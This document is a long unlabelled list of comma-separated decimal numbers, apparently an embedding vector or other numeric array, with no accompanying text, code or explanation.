-0.036165766417980194, -0.018563080579042435, 0.01946859620511532, -0.006187693681567907, 0.019303957000374794, -0.009981256909668446, -0.009905797429382801, -0.0019190767779946327, -0.013280902989208698, -0.03487608954310417, -0.019839035347104073, -0.019482316449284554, 0.013500422239303589, -0.0239824578166008, 0.005052368156611919, 0.011250351555645466, 0.015023335814476013, -0.02303578145802021, 0.013932600617408752, 0.019043277949094772, 0.0014697486767545342, -0.023762937635183334, 0.00030698368209414184, 0.018233802169561386, -0.02767312154173851, 0.0013248318573459983, 0.013383802957832813, -0.015352614223957062, 0.0171910859644413, -0.008389743976294994, 0.000045795663027092814, -0.0036186345387250185, -0.023735499009490013, 0.01742432452738285, 0.00773118669167161, -0.03339433670043945, -0.01027623564004898, -0.015901412814855576, 0.009857777506113052, -0.009014001116156578, 0.009967537596821785, 0.015572133474051952, 0.024325456470251083, 0.036549922078847885, 0.0028640376403927803, 0.008952261880040169, 0.03402545303106308, -0.029635073617100716, 0.027151763439178467, 0.02064851112663746, -0.032735779881477356, -0.01140127144753933, 0.014556857757270336, -0.06069701910018921, 0.008190805092453957, 0.01801428198814392, 0.02221258543431759, 0.023227861151099205, -0.048568591475486755, -0.008321144618093967, -0.012821285054087639, -0.011257211677730083, -0.01754780486226082, 0.025999289005994797, 0.019331397488713264, -0.030074112117290497, -0.031116826459765434, 0.029497873038053513, 0.029909471049904823, 0.0075253876857459545, -0.018947238102555275, 0.0024935994297266006, -0.0036220645997673273, 0.006925140507519245, -0.007820366881787777, -0.0015709332656115294, -0.02490169368684292, 0.001025565667077899, 0.01317114382982254, 0.012485146522521973, 0.020072273910045624, 0.021430548280477524, -0.06366052478551865, 0.002695968374609947, 0.007621427532285452, 0.01813776232302189, 0.012876165099442005, 0.0021780405659228563, 0.0364401638507843, 0.04714171960949898, -0.01747920550405979, -0.034272413700819016, -0.002792007988318801, -0.01200494822114706, -0.05460536479949951, -0.010866193100810051, 0.02549165114760399, -0.007244129199534655, -0.009521638974547386, -0.04417821019887924, 0.027028284966945648, 0.01872771978378296, -0.0017578675178810954, -0.007319588679820299, -0.002692538546398282, 0.022404663264751434, -0.009034581482410431, -0.016930406913161278, 0.019893914461135864, 0.00781350675970316, -0.026506926864385605, 0.04999546706676483, 0.009885217994451523, -0.020566191524267197, 0.000055469292419729754, 0.004819129593670368, -0.026479486376047134, 0.008917962200939655, 0.01601117104291916, 0.00881506223231554, -0.013582741841673851, -0.04793747514486313, 0.02743988297879696, -0.017726164311170578, -0.001219359808601439, 0.012608625926077366, -0.004647630266845226, -0.00918550044298172, 0.004129702225327492, -0.00753910792991519, -0.019893914461135864, -0.023515978828072548, -0.021307067945599556, 0.013870860449969769, 0.006064213812351227, 0.024970293045043945, -0.00236325990408659, 0.03937623277306557, -0.004510430619120598, 0.016491370275616646, -0.001233937218785286, 0.010975953191518784, -0.013658201321959496, 0.021252188831567764, -0.04176349937915802, 0.01698528788983822, 0.010406575165688992, -0.006290593184530735, -0.02941555343568325, -0.007868385873734951, 0.014419658109545708, -0.013047664426267147, -0.01624440960586071, -0.010193916037678719, -0.03172050416469574, -0.03984270989894867, 0.017890803515911102, 0.007182389032095671, 0.01200494822114706, -0.0013548441929742694, 0.03399801626801491, 0.01450197771191597, -0.004434971138834953, 0.00027075447724200785, 0.0025964989326894283, 0.005800105165690184, 0.00372839393094182, -0.018316121771931648, 0.018467040732502937, -0.023515978828072548, 0.022528143599629402, 0.01639533042907715, 0.022171424701809883, -0.008952261880040169, 0.031555864959955215, -0.024791933596134186, 0.00018918512796517462, -0.01200494822114706, 0.0035809045657515526, 0.0040199426002800465, -0.017492925748229027, 0.03298274055123329, -0.011689390055835247, 0.0030218169558793306, 0.020072273910045624, -0.0332571379840374, -0.019454875960946083, -0.011264071799814701, 0.0002203765616286546, -0.012327367439866066, 0.014378498308360577, -0.023941297084093094, -0.0045584505423903465, 0.013006504625082016, -0.011421850882470608, 0.002970367204397917, 0.012889884412288666, 0.017890803515911102, 0.020442713052034378, -0.02790636010468006, 0.024462655186653137, 0.011819729581475258, 0.011792289093136787, -0.012306787073612213, -0.02224002406001091, 0.01487241592258215, 0.002159175695851445, -0.0039101834408938885, 0.0077380468137562275, 0.012025528587400913, 0.014858696609735489, 0.05334313213825226, -0.024380335584282875, -0.00794384628534317, -0.047004517167806625, 0.04055614769458771, -0.0016755477990955114, -0.009967537596821785, 0.02011343464255333, -0.0023495398927479982, -0.026095328852534294, -0.0004118126234970987, -0.013191723264753819, 0.027988679707050323, 0.04708683863282204, -0.008472063578665257, -0.021128710359334946, -0.025093773379921913, 0.0013145419070497155, -0.00017396456678397954, -0.007285289000719786, -0.043931253254413605, -0.02551909163594246, -0.002277510240674019, -0.027179203927516937, -0.019921354949474335, -0.002778288209810853, -0.027398722246289253, -0.021842146292328835, 0.04382149130105972, -0.02380409836769104, 0.02554653026163578, 0.019262798130512238, -0.003690664190798998, 0.011023973114788532, 0.001110457698814571, 0.004098832607269287, -0.03893719241023064, 0.0006894270773045719, -0.017259685322642326, 0.00658557191491127, -0.004242891911417246, -0.023612018674612045, -0.010907352901995182, -0.0036289244890213013, -0.032269302755594254, -0.02442149631679058, -0.004976908676326275, 0.0021008660551160574, 0.015242855064570904, 0.005834404844790697, 0.029223475605249405, -0.020621072500944138, -0.01975671574473381, 0.016559969633817673, 0.026438327506184578, -0.010591794736683369, 0.024023616686463356, -0.009288400411605835, 0.0053233373910188675, -0.03224186226725578, 0.03534257039427757, -0.009535359218716621, 0.003433415200561285, -0.01373366080224514, -0.014762656763195992, -0.0016746902838349342, -0.0297448318451643, -0.03740055859088898, 0.007285289000719786, -0.0068153808824718, 0.012738965451717377, 0.02418825589120388, 0.0191118773072958, -0.02226746454834938, 0.01231364719569683, -0.008108485490083694, 0.004026802722364664, -0.010008697398006916, -0.0018127472139894962, 0.01367192156612873, -0.01550353318452835, 0.024586135521531105, 0.007518528029322624, -0.003560324665158987, 0.004109122324734926, 0.030321070924401283, 0.02442149631679058, -0.007772346958518028, 0.002301520202308893, -0.0019962515216320753, -0.01023507583886385, -0.015819093212485313, 0.011181752197444439, 0.03490353003144264, 0.0004904879024252295, -0.0286197979003191, -0.01109257247298956, 0.010612374171614647, -0.012835005298256874, 0.03778471797704697, 0.015393774025142193, -0.01081131398677826, 0.0013565592234954238, -0.005608025938272476, 0.013781680725514889, -0.000710435735527426, -0.03841583430767059, -0.010818174108862877, -0.009823477827012539, -0.02531329169869423, -0.004863718990236521, -0.015873972326517105, 0.008835642598569393, -0.04244949668645859, -0.02259674295783043, 0.035809047520160675, 0.03509560972452164, -0.024284295737743378, -0.022994620725512505, -0.039705511182546616, -0.025820929557085037, 0.0037935636937618256, 0.006685041356831789, 0.02134822867810726, 0.0005136402905918658, -0.0019190767779946327, 0.02829051949083805, 0.04450748860836029, -0.001386571559123695, 0.001965381670743227, 0.003899893257766962, 0.030046671628952026, -0.014817536808550358, 0.0053782169707119465, -0.01939999684691429, -0.0052924673072993755, 0.007415628060698509, -0.0003811571223195642, -0.01568189263343811, -0.0037489740643650293, 0.03056802973151207, 0.016079770401120186, 0.0012107847724109888, -0.00905516091734171, 0.0025484790094196796, -0.011435571126639843, -0.03833351656794548, -0.029168594628572464, 0.02019575424492359, 0.009391299448907375, 0.0035740446764975786, 0.008197665214538574, -0.0026462336536496878, 0.01312998402863741, 0.012265627272427082, -0.002978942357003689, -0.004657919984310865, -0.006750211119651794, 0.005117537919431925, -0.029305795207619667, -0.038882315158843994, 0.009459899738430977, 0.011469870805740356, 0.008712162263691425, -0.00550169637426734, 0.01913931779563427, -0.004102262668311596, 0.0014920436078682542, -0.02108754962682724, -0.028125880286097527, -0.01747920550405979, -0.019207917153835297, 0.0012913894606754184, 0.009425600059330463, -0.005975034553557634, -0.025217251852154732, 0.017204806208610535, -0.01875516027212143, 0.003556894836947322, 0.0160660520195961, 0.027577081695199013, 0.013212303631007671, 0.01811032183468342, -0.04837651178240776, -0.008108485490083694, -0.0002943356230389327, 0.0109142130240798, -0.06371540576219559, 0.003978782799094915, -0.01898839883506298, -0.017232246696949005, 0.002918917452916503, 0.017492925748229027, 0.014447098597884178, 0.028400277718901634, -0.015736771747469902, 0.024887973442673683, -0.021773546934127808, -0.03399801626801491, -0.028153318911790848, 0.005618316121399403, -0.029909471049904823, -0.010591794736683369, 0.05411144718527794, -0.003594624577090144, -0.0006139673641882837, -0.0286197979003191, 0.024682173505425453, 0.01704016700387001, -0.005683485884219408, -0.006252863444387913, 0.027892639860510826, 0.01642276905477047, -0.002893192693591118, -0.03649504482746124, -0.01017333660274744, 0.008129064925014973, -0.0259032491594553, -0.016930406913161278, -0.026095328852534294, -0.011476730927824974, -0.029964352026581764, 0.02185586653649807, 0.014803816564381123, 0.01072213426232338, -0.006300882901996374, 0.01901583932340145, -0.006177403498440981, 0.012162728235125542, -0.024819374084472656, -0.004654489923268557, -0.010756433941423893, 0.01816520281136036, 0.047443557530641556, -0.013905160129070282, 0.04244949668645859, 0.011565910652279854, -0.004846569150686264, -0.0037524038925766945, -0.008376023732125759, 0.043519653379917145, -0.02577976882457733, -0.007978145964443684, -0.011661950498819351, -0.011524750851094723, -0.0016343879979103804, 0.004328641574829817, -0.003893033368512988, -0.005680055823177099, 0.025628849864006042, -0.0032053212635219097, -0.014158979058265686, 0.006685041356831789, 0.004791689570993185, 0.003045826917514205, -0.03794935718178749, -0.0021042958833277225, 0.021169869229197502, -0.023872697725892067, -0.0321321040391922, -0.0048980191349983215, 0.05998358502984047, -0.009699998423457146, -0.0068462505005300045, -0.0035671847872436047, -0.011188612319529057, 0.0008815062465146184, 0.015777932479977608, -0.02141682803630829, 0.017328286543488503, -0.024641014635562897, 0.013493562117218971, -0.00041695759864524007, 0.03764751926064491, -0.009254100732505322, -0.015325174666941166, -0.01275954581797123, 0.007930126041173935, -0.01813776232302189, 0.010193916037678719, -0.016697168350219727, -0.01680692844092846, -0.01878259889781475, 0.00499748857691884, -0.02162262797355652, -0.024819374084472656, -0.014392218552529812, -0.00035007286351174116, 0.002654808573424816, 0.009768597781658173, 0.0033356607891619205, 0.022843701764941216, 0.009981256909668446, -0.006444942206144333, -0.014639177359640598, 0.017739884555339813, -0.005158697720617056, 0.023941297084093094, -0.0030321069061756134, -0.0009561083861626685, 0.0021797555964440107, -0.021663786843419075, -0.021897025406360626, -0.009631399065256119, 0.012059828266501427, -0.037318240851163864, -0.002766283228993416, 0.007587127387523651, -0.016614848747849464, -0.004853429272770882, 0.008547523058950901, -0.010139036923646927, -0.008897381834685802, 0.0003627209516707808, -0.02395501732826233, 0.005192997865378857, 0.006005904171615839, 0.016916686668992043, 0.0844050794839859, -0.0029652223456650972, -0.00564232561737299, -0.01588769257068634, -0.0030080971773713827, -0.010612374171614647, 0.003229331225156784, -0.020072273910045624, -0.005549716297537088, -0.012622346170246601, 0.023666897788643837, -0.003865593345835805, 0.019221637398004532, 0.01373366080224514, 0.005000918637961149, 0.0038175736553967, -0.0011927774176001549, -0.003490010043606162, 0.015064495615661144, -0.0074842278845608234, 0.009665698744356632, 0.003985642921179533, 0.007326448801904917, -0.019811594858765602, 0.030074112117290497, -0.0185493603348732, -0.0310070663690567, -0.029964352026581764, -0.03355897590517998, -0.02684992551803589, -0.0021231609862297773, 0.009651978500187397, -0.007717466913163662, -0.00440753111615777, -0.005179277621209621, -0.007792926859110594, 0.02239094488322735, -0.015558413229882717, -0.006132813636213541, -0.020511312410235405, 0.0028657526709139347, -0.013479841873049736, -0.018672840669751167, -0.0020820011850446463, 0.00019776009139604867, -0.023845257237553596, 0.018028002232313156, -0.015297734178602695, -0.007772346958518028, 0.01591513119637966, 0.005247877445071936, -0.016134651377797127, 0.009590239264070988, -0.00622542342171073, 0.01203238870948553, 0.0043046316131949425, -0.00564232561737299, -0.014556857757270336, -0.02711060456931591, 0.0030938468407839537, -0.006551271770149469, 0.01004299707710743, -0.027398722246289253, -0.0009629683918319643, 0.009844058193266392, 0.010756433941423893, -0.0070589096285402775, 0.001484326203353703, -0.01780848391354084, 0.002267220290377736, 0.004013082943856716, 0.00567662576213479, 0.00649639219045639, 0.002025406341999769, -0.0109142130240798, 0.023502258583903313, -0.009377580136060715, 0.028317958116531372, -0.009528499096632004, -0.03841583430767059, 0.04678500071167946, 0.01872771978378296, -0.012896744534373283, 0.03023875132203102, 0.005529136396944523, 0.03622064366936684, -0.021101269870996475, -0.021718667820096016, 0.015050775371491909, 0.0018967818468809128, -0.012176447547972202, -0.0030372519977390766, 0.002150600776076317, 0.001741575077176094, 0.013383802957832813, 0.03358641639351845, 0.019454875960946083, -0.005326766986399889, -0.006424362305551767, -0.0058995746076107025, 0.017671285197138786, -0.014611737802624702, 0.031116826459765434, -0.00038694520480930805, -0.0034505652729421854, 0.005882424768060446, -0.009885217994451523, 0.02152658812701702, -0.006259723100811243, -0.011469870805740356, -0.03720847889780998, -0.011977508664131165, 0.026452045887708664, -0.024092216044664383, -0.009789178147912025, 0.006187693681567907, 0.016340449452400208, -0.020922910422086716, -0.008554383181035519, -0.02723408304154873, -0.013973760418593884, -0.023104380816221237, 0.03490353003144264, 0.01095537282526493, 0.003328800667077303, -0.008540663868188858, -0.007662587333470583, -0.028455158695578575, 0.018206361681222916, 0.021938186138868332, 0.018274961039423943, 0.004819129593670368, 0.013582741841673851, -0.025244692340493202, 0.018178923055529594, -0.029580192640423775, 0.01629929058253765, 0.0017955972580239177, -0.021869586780667305, 0.010921073146164417, -0.012512586079537868, 0.007052049972116947, 0.014735217206180096, -0.0139120202511549, -0.0004656205128412694, -0.009151200763881207, -0.015901412814855576, 0.004870579112321138, 0.010303676128387451, 0.012286207638680935, -0.016697168350219727, -0.031610745936632156, -0.0007571692694909871, 0.026424607262015343, -0.0018916368717327714, -0.008197665214538574, 0.019056998193264008, -0.015146815218031406, 0.005652615800499916, -0.002807443030178547, 0.011826589703559875, 0.010845613665878773, 0.01783592440187931, -0.012903604656457901, 0.004479561001062393, 0.028949076309800148, -0.0015392058994621038, -0.022363504394888878, -0.02785148099064827, -0.0191118773072958, 0.017026446759700775, 0.0020682811737060547, -0.02377665787935257, 0.004973478615283966, 0.0019225067226216197, 0.012464567087590694, -0.004352651536464691, 0.013569021597504616, 0.026506926864385605, -0.02513493224978447, 0.004417821299284697, 0.022075384855270386, 0.035754166543483734, 0.006359193008393049, 0.015133094973862171, -0.02067595161497593, -0.018233802169561386, 0.00513811782002449, -0.018178923055529594, 0.031116826459765434, -0.0035671847872436047, 0.02528585121035576, -0.01870027929544449, -0.001416583894751966, -0.016902968287467957, -0.03210466355085373, -0.0014028639998286963, -0.030074112117290497, -0.014858696609735489, 0.01172368973493576, -0.005854984745383263, -0.012341086752712727, -0.008485783822834492, 0.02191074565052986, -0.02088174968957901, -0.011085712350904942, 0.008177084848284721, 0.019427437335252762, 0.00045404431875795126, -0.01153161097317934, -0.002464444376528263, 0.011709969490766525, 0.0006396922399289906, 0.020744550973176956, 0.003478005062788725, 0.006739920936524868, -0.006294023245573044, -0.03298274055123329, -0.0038038536440581083, 0.0024027046747505665, -0.012725245207548141, 0.020922910422086716, 0.018357280641794205, 0.036961521953344345, -0.011833448894321918, 0.01546237338334322, 0.03838839381933212, -0.012656645849347115, -0.00690456060692668, 0.01544865407049656, -0.0013076819013804197, 0.009603958576917648, -0.008074185810983181, -0.0076831672340631485, -0.00128281454090029, -0.0337236151099205, -0.012677225284278393, 0.011270931921899319, -0.010996532626450062, 0.0027525632176548243, 0.02587580867111683, 0.010385995730757713, -0.01698528788983822, -0.0014894711785018444, -0.0018504770705476403, -0.00009378865797771141, 0.02247326448559761, -0.020072273910045624, 0.0018659119959920645, 0.04280621558427811, -0.03207722306251526, -0.01680692844092846, -0.009062021039426327, -0.01413153950124979, -0.005580585915595293, 0.026506926864385605, -0.020182034000754356, 0.006252863444387913, -0.00037000965676270425, -0.0077792066149413586, -0.004603040404617786, -0.0024558694567531347, 0.009411879815161228, 0.012979064136743546, -0.020278073847293854, 0.02728896401822567, 0.006616441532969475, -0.015613293275237083, 0.018261242657899857, -0.008204525336623192, 0.0007323018508031964, -0.008087905123829842, 0.015819093212485313, -0.013116263784468174, 0.006568422075361013, 0.004918599035590887, -0.012745825573801994, -0.002792007988318801, 0.0041880118660628796, -0.0024181397166103125, 0.008451484143733978, 0.05608712136745453, 0.016162090003490448, -0.00685997074469924, 0.004380091093480587, -0.00803302600979805, -0.03589136525988579, -0.0009260960505343974, -0.012821285054087639, -0.011675669811666012, -0.0025399040896445513, -0.0001571362081449479, -0.020003674551844597, -0.02055247128009796, 0.007340168580412865, -0.0152702946215868, -0.017287125810980797, 0.003923903219401836, -0.020387832075357437, 0.0059853242710232735, 0.019125597551465034, 0.025107491761446, 0.016546249389648438, 0.017945682629942894, -0.007292148657143116, -0.004050812683999538, -0.012430266477167606, 0.012059828266501427, -0.0027491331566125154, -0.016614848747849464, -0.0015700757503509521, -0.010777014307677746, -0.008938541635870934, -0.012073548510670662, 0.018974678590893745, -0.00785466656088829, -0.0024284296669065952, 0.013843420892953873, -0.00667475163936615, 0.014707776717841625, -0.016669727861881256, -0.027371283620595932, -0.03210466355085373, -0.026452045887708664, -0.006506682373583317, 0.00909632071852684, 0.012780125252902508, -0.01677948795258999, 0.005525706335902214, -0.018892358988523483, 0.013603322207927704, 0.021746106445789337, 0.030485710129141808, 0.00976173859089613, 0.009624538943171501, -0.0035740446764975786, 0.00436294125393033, 0.00032734923297539353, -0.000583526270929724, 0.01881003938615322, -0.02029179222881794, 0.012471426278352737, -0.0022123404778540134, 0.023694338276982307, 0.013198583386838436, 0.01435105875134468, -0.006966300308704376, -0.019029557704925537, 0.006784510798752308, -0.035479769110679626, -0.016902968287467957, -0.006328322924673557, -0.017492925748229027, 0.01913931779563427, -0.007868385873734951, 0.020003674551844597, 0.015146815218031406, -0.007978145964443684, 0.01688924804329872, -0.03435473144054413, -0.021663786843419075, 0.03183026239275932, -0.009110040962696075, -0.004664780106395483, 0.01704016700387001, -0.021773546934127808, -0.015352614223957062, 0.009226660244166851, -0.006129383575171232, -0.006907990202307701, -0.015393774025142193, 0.025381891056895256, -0.01993507519364357, 0.003923903219401836, -0.012889884412288666, 0.019207917153835297, -0.0001371994148939848, -0.009439319372177124, -0.014886136166751385, 0.012745825573801994, 0.009960677474737167, -0.001084732823073864, -0.010379135608673096, -0.007717466913163662, -0.026863645762205124, 0.03125402703881264, -0.012498866766691208, 0.005800105165690184, -0.010893633589148521, 0.03377849608659744, 0.009919517673552036, 0.00980289839208126, 0.029717393219470978, 0.03059546835720539, 0.010831893421709538, -0.003455710131675005, 0.03183026239275932, -0.0010161331156268716, -0.012752685695886612, -0.021307067945599556, 0.009693138301372528, -0.003824433544650674, 0.0018847769824787974, 0.012052968144416809, 0.005570296198129654, 0.009343280456960201, 0.006221993360668421, -0.02613648772239685, 0.032269302755594254, 0.010667254216969013, 0.0020151163917034864, 0.005889284890145063, 0.0011216051643714309, -0.013802261091768742, -0.004023372661322355, 0.014831256121397018, -0.01624440960586071, -0.0038724534679204226, -0.018768880516290665, 0.01747920550405979, 0.00449671084061265, 0.004702509846538305, -0.027275243774056435, -0.04190070182085037, 0.006036774255335331, -0.013891440816223621, 0.01271152589470148, -0.014255018904805183, 0.001081302878446877, -0.014378498308360577, 0.02549165114760399, 0.01760268397629261, -0.0010718704434111714, -0.02073083072900772, -0.006901130545884371, 0.0038278636056929827, -0.019180478528141975, -0.010735854506492615, -0.00918550044298172, -0.006438082549721003, 0.026397166773676872, -0.016491370275616646, -0.015750491991639137, -0.0038312936667352915, -0.009665698744356632, 0.0029652223456650972, -0.01612093113362789, -0.011023973114788532, -0.000600247411057353, -0.020099714398384094, -0.0010169906308874488, 0.005539426114410162, 0.006805090699344873, 0.019592076539993286, -0.01511937566101551, 0.00781350675970316, -0.0034917250741273165, 0.008197665214538574, -0.0031487264204770327, -0.0004060245119035244, -0.0017398600466549397, -0.011065132915973663, 0.026740165427327156, 0.021993065252900124, 0.010735854506492615, -0.0004767679492942989, -0.0000855352554935962, 0.00016270992637146264, 0.005337057169526815, -0.027398722246289253, 0.030348509550094604, 0.006132813636213541, 0.008355444297194481, 0.013836560770869255, -0.0007421631016768515, -0.011161171831190586, -0.0239824578166008, -0.01960579678416252, -0.005848125088959932, -0.007408768404275179, 0.004383521154522896, -0.013692501001060009, 0.004987198859453201, 0.02090919017791748, -0.01027623564004898, 0.016820648685097694, -0.0007678879774175584, 0.01072213426232338, -0.010091017000377178, 0.025711169466376305, 0.01448825839906931, 0.002848602831363678, -0.004664780106395483, 0.006060784216970205, 0.019098158925771713, 0.0013136843917891383, 0.009158060885965824, 0.022336063906550407, 0.018768880516290665, 0.022432103753089905, 0.006606151815503836, -0.017383165657520294, -0.003236191114410758, 0.002514179330319166, 0.007882106117904186, -0.008554383181035519, -0.006547842174768448, 0.010187056846916676, 0.009542219340801239, -0.006345472764223814, -0.002855462720617652, -0.0028434577398002148, -0.006029914133250713, -0.005522276274859905, -0.001848762040026486, 0.00459275022149086, -0.020428992807865143, -0.01627185009419918, -0.03410777449607849, -0.0014706061920151114, -0.007319588679820299, 0.007134369574487209, -0.0015554983401671052, -0.015585853718221188, -0.0018058873247355223, 0.017300846055150032, 0.024448934942483902, -0.002579348860308528, -0.006842820905148983, -0.0030441118869930506, -0.0019139318028464913, 0.02628740668296814, -0.010125316679477692, 0.006033344194293022, -0.00772432703524828, 0.014968455769121647, 0.011195472441613674, -0.01393946073949337, -0.0006375485099852085, 0.001308539416640997, 0.00022402091417461634, -0.01430989895015955, 0.010660394094884396, 0.024380335584282875, 0.002016831422224641, -0.005439956672489643, 0.001632672967389226, 0.006163683719933033, 0.001741575077176094, 0.0028811877127736807, 0.010536914691329002, -0.01822008192539215, -0.007532247807830572, -0.008321144618093967, -0.0007485942915081978, -0.00980289839208126, 0.0026119337417185307, 0.0054502468556165695, -0.00695601012557745, 0.013116263784468174, -0.001618095557205379, -0.0018041722942143679, 0.025642570108175278, 0.0010761579032987356, 0.012457706965506077, 0.019646955654025078, -0.0008322001667693257, 0.01023507583886385, 0.008067325688898563, -0.00977545790374279, 0.017767323181033134, -0.0026891084853559732, 0.0026719586458057165, 0.02324158139526844, -0.02977227233350277, 0.013754241168498993, 0.008437763899564743, -0.025916969403624535, -0.016971567645668983, -0.013713081367313862, 0.014954735524952412, -0.01190204918384552, -0.019221637398004532, 0.014227579347789288, 0.00931583996862173, -0.011456150561571121, 0.010735854506492615, -0.006853110622614622, -0.03671456128358841, -0.017410606145858765, 0.01763012446463108, 0.019948795437812805, -0.024201976135373116, 0.012395966798067093, 0.00931583996862173, -0.02595812827348709, -0.0012502296594902873, -0.007758626714348793, -0.004157142248004675, 0.009850917384028435, 0.0008124777814373374, 0.008177084848284721, -0.004531010519713163, -0.012855584733188152, 0.004918599035590887, 0.009898937307298183, 0.02985459193587303, -0.0045721703208982944, -0.00781350675970316, -0.020332952961325645, 0.012855584733188152, -0.004623620305210352, 0.006516972091048956, 0.014062940143048763, 0.010578074492514133, -0.011126872152090073, -0.008149645291268826, 0.016916686668992043, -0.01509193517267704, -0.04420565068721771, 0.006818810943514109, 0.007367608603090048, -0.01901583932340145, 0.009727437980473042, 0.0033802504185587168, 0.0015151960542425513, 0.038168877363204956, -0.029580192640423775, 0.013891440816223621, 0.002956647425889969, 0.02664412558078766, 0.025381891056895256, -0.012395966798067093, 0.014748936519026756, -0.0038038536440581083, 0.028070999309420586, -0.010680974461138248, -0.0035260249860584736, -0.001655825413763523, -0.018302401527762413, -0.014378498308360577, -0.02498401328921318, -0.010036136955022812, -0.005398796871304512, -0.0038278636056929827, -0.006300882901996374, 0.02829051949083805, -0.0019670964684337378, -0.03331201896071434, 0.006386632565408945, -0.000014175486285239458, 0.006976590026170015, 0.00025596265913918614, 0.021361948922276497, 0.005964744370430708, -0.01550353318452835, 0.00868472270667553, 0.002196905668824911, 0.017122486606240273, 0.0020442712120711803, 0.022130265831947327, 0.02191074565052986, -0.009898937307298183, 0.005937304813414812, 0.012979064136743546, 0.01072213426232338, -0.002128305844962597, -0.009158060885965824, 0.016559969633817673, 0.005827545188367367, -0.015517253428697586, -0.0016309580532833934, -0.023090660572052002, 0.002181470626965165, -0.017520364373922348, -0.012224467471241951, 0.009748018346726894, -0.0015992306871339679, -0.027192924171686172, -0.023433659225702286, 0.011332671158015728, -0.006839390844106674, 0.013294623233377934, -0.0012699520448222756, 0.004623620305210352, -0.02200678549706936, 0.0009861207799986005, -0.012320507317781448, 0.005964744370430708, -0.01203238870948553, 0.022075384855270386, 0.0003376391832716763, 0.01385028101503849, 0.010111596435308456, 0.012848724611103535, -0.029086275026202202, -0.000973258342128247, 0.016875527799129486, 0.004308061674237251, 0.03174794465303421, 0.021993065252900124, -0.014598017558455467, 0.011984368786215782, 0.019715555012226105, 0.010091017000377178, 0.009329560212790966, -0.004139992408454418, 0.004030232783406973, 0.021732386201620102, -0.0003003380843438208, 0.01747920550405979, 0.00037601214717142284, -0.002497029257938266, -0.010221356526017189, -0.012944764457643032, 0.01852191984653473, 0.000445469340775162, -0.00995381735265255, 0.02761824242770672, -0.007436207961291075, -0.015873972326517105, 0.0040370929054915905, 0.00225178524851799, 0.005964744370430708, 0.018412161618471146, 0.013219163753092289, -0.008746462874114513, -0.02711060456931591, -0.024846812710165977, -0.00400279276072979, 0.011339531280100346, 0.009014001116156578, 0.019070718437433243, 0.010207636281847954, -0.000026622581572155468, -0.03871767595410347, 0.00772432703524828, -0.018508201465010643, -0.003642644500359893, -0.023310180753469467, 0.033065058290958405, 0.0029806571546941996, -0.007600847631692886, -0.004805409349501133, 0.010667254216969013, 0.02167750708758831, -0.00304239708930254, 0.018274961039423943, -0.02625996805727482, 0.014460817910730839, -0.01544865407049656, 0.014639177359640598, -0.017383165657520294, 0.0054090870544314384, 0.0075253876857459545, -0.011017112992703915, 0.010639814659953117, 0.007621427532285452, 0.011305231600999832, -0.02979971282184124, -0.0004596180224325508, 0.015544693917036057, 0.01027623564004898, 0.03786703944206238, 0.006359193008393049, 0.0075253876857459545, -0.004764249548316002, -0.026740165427327156, -0.010255656205117702, -0.0030664068181067705, 0.010392855852842331, 0.0006697046337649226, 0.01734200492501259, -0.023118101060390472, -0.0014303039060905576, -0.011298371478915215, 0.018563080579042435, -0.015970012173056602, -0.009089461527764797, -0.006348902825266123, 0.017794763669371605, -0.006729631219059229, -0.005988754332065582, -0.00391361303627491, 0.03794935718178749, 0.0031452965922653675, 0.007936986163258553, 0.030869867652654648, -0.0002456727088429034, -0.01883747987449169, -0.0026376587338745594, -0.000058845685998676345, -0.006263153161853552, 0.004640770144760609, 0.0004088113782927394, -0.02093663066625595, -0.022816263139247894, 0.006304312963038683, 0.008520083501935005, -0.022610463201999664, -0.009782318025827408, -0.023076940327882767, -0.011257211677730083, 0.00020269068772904575, 0.02239094488322735, 0.01144243124872446, 0.000280615669908002, -0.0009441034635528922, -0.0018333271145820618, -0.00831428449600935, -0.011270931921899319, 0.0014671762473881245, -0.03833351656794548, 0.005206717643886805, 0.0030715519096702337, 0.00037365403841249645, -0.021581467241048813, 0.020428992807865143, 0.020044833421707153, -0.02055247128009796, 0.017671285197138786, 0.0014560287818312645, -0.0074293483048677444, -0.004747099708765745, -0.0038278636056929827, -0.011538470163941383, 0.012217607349157333, -0.011243491433560848, 0.00581725500524044, 0.008012445643544197, -0.004555020481348038, 0.0003640071954578161, -0.009720578789710999, -0.01162079069763422, -0.015325174666941166, 0.009946957230567932, 0.008808202110230923, -0.02016831375658512, -0.02749476209282875, 0.032296743243932724, 0.005611455999314785, -0.014200138859450817, 0.0166285689920187, 0.0032567710150033236, 0.010255656205117702, -0.010879913344979286, 0.012293067760765553, -0.003851873567327857, -0.012107848189771175, -0.03089730814099312, -0.002524469280615449, 0.001040143077261746, 0.0034848651848733425, 0.017616404220461845, 0.022761382162570953, -0.014803816564381123, 0.012965344823896885, -0.014831256121397018, -0.010104736313223839, -0.008190805092453957, 0.014831256121397018, 0.014968455769121647, 0.03951343148946762, -0.03720847889780998, 0.008760182186961174, -0.028811877593398094, -0.022226305678486824, -0.01295162457972765, -0.005481116473674774, -0.00027268382837064564, -0.0014225863851606846, -0.003243051003664732, 0.006444942206144333, 0.010070436634123325, -0.009768597781658173, -0.020099714398384094, -0.00022830840316601098, -0.025025172159075737, -0.021375669166445732, 0.0031161417718976736, 0.004253181628882885, 0.001043573021888733, -0.022555584087967873, -0.009857777506113052, -0.008149645291268826, -0.013623901642858982, 0.016436489298939705, 0.009418739937245846, -0.019770435988903046, -0.019976234063506126, 0.005096958018839359, 0.00013987909187562764, -0.027165483683347702, 0.027426162734627724, 0.024846812710165977, -0.008238825015723705, 0.003810713766142726, -0.008156505413353443, 0.030348509550094604, 0.0042909118346869946, 0.007587127387523651, -0.014543137513101101, -0.003858733456581831, 0.03520536795258522, -0.004808839410543442, 0.009933237917721272, 0.006215133238583803, 0.004397241398692131, -0.012279347516596317, 0.01822008192539215, -0.00015477808483410627, 0.0012279347283765674, 0.002550194039940834, 0.006698761135339737, 0.0057898154482245445, -0.0012433696538209915, -0.004510430619120598, -0.019125597551465034, -0.024709613993763924, 0.024201976135373116, 0.02406477741897106, 0.0032121811527758837, -0.0034025453496724367, 0.005120967980474234, -0.00295321736484766, -0.011483591049909592, 0.001248514628969133, -0.01450197771191597, -0.005614886060357094, -0.004671640228480101, -0.016024891287088394, 0.011071993038058281, -0.0002548907941672951, 0.02052503265440464, -0.05040706321597099, 0.01765756495296955, -0.005522276274859905, -0.015407494269311428, -0.018851200118660927, -0.02088174968957901, -0.006338612642139196, -0.0041228425689041615, 0.012052968144416809, -0.02979971282184124, -0.013308343477547169, -0.0066507416777312756, 0.00363235455006361, -0.0036563642788678408, 